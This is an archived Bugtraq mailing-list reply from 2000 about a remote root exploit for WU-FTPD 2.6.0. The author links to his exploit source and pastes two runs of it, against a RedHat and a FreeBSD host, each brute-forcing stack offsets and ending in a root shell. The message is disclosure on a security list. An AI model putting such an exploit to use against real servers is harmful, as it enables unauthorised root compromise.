[15614] in bugtraq
Re: WuFTPD: Providing *remote* root since at least1994
daemon@ATHENA.MIT.EDU (Przemyslaw Frasunek)
Sun Jul 2 17:12:05 2000
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-Id: <015201bfe36e$c999c9b0$0273b6d4@own3d>
Date: Sat, 1 Jul 2000 17:12:35 +0200
Reply-To: Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
From: Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
X-To: eric.hines@nuasis.com
To: BUGTRAQ@SECURITYFOCUS.COM
> Has anyone come out with a working version of this exploit script. Both
> versions provided on the securityfocus.com web site, and or the one
distributed
> here by TF8 is not working, even after I fixed his code. Do we know for sure
> the thing even exists.. I dunno, can anyone direct me to the actual code,
> because I have yet to see a working version of it that doesn't CORE dump.
sure? both, tf8's and mine (http://v.freebsd.lublin.pl/sources/bobek.c), works
on my redhat and bsd boxes:
lubi:venglin:~> ./b -t 4 pedagog
Selected platform: RedHat Linux 6.2 with WUFTPD 2.6.0-RPM
Connected to pedagog. Trying to log in.
Logged in as ftp. Checking vulnerability.
Ok, trying to find offset (initial: 1024)
at offset 1024
at offset 1032
at offset 1040
at offset 1048
at offset 1056
at offset 1064
at offset 1072
at offset 1080
at offset 1088
at offset 1096
RET: 0x80759e0, RET location: 0xbfffcf74, RET location offset on stack: 1100
Reply size: 289, New RET: 0x80758bf
Wait 10-20 seconds for reply. Enjoy your shell.
[...]
0000000000000000000000000000000
Linux pedagog.xxx.xxx.xx 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686 unknown
/
uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp)
another exaple:
lubi:venglin:~> ./b localhost
Selected platform: FreeBSD 3.4-STABLE with WUFTPD 2.6.0-ports
Connected to localhost. Trying to log in.
Logged in as ftp. Checking vulnerability.
Ok, trying to find offset (initial: 1024)
at offset 1024
at offset 1032
at offset 1040
at offset 1048
at offset 1056
at offset 1064
at offset 1072
RET: 0x80b1f10, RET location: 0xbfbfcc04, RET location offset on stack: 1076
Reply size: 527, New RET: 0x80b1d01
Wait 10-20 seconds for reply. Enjoy your shell.
[...]
00000000000000000000000000000000000000000000000000000000000000
FreeBSD lubi.xxx.xxx.xx 3.4-STABLE FreeBSD 3.4-STABLE #1: Wed Mar 1 11:18:54
CET 2000 venglin@lubi.xxx.xxx.xx:/mnt/elite/usr/src/sys/compile/GADACZKA
i386
/
uid=0(root) gid=0(wheel) egid=5(operator) groups=5(operator)
--
* Fido: 2:480/124 ** WWW: http://www.freebsd.lublin.pl ** NIC-HDL: PMF9-RIPE *
* Inet: venglin@freebsd.lublin.pl ** PGP: D48684904685DF43 EA93AFA13BE170BF *
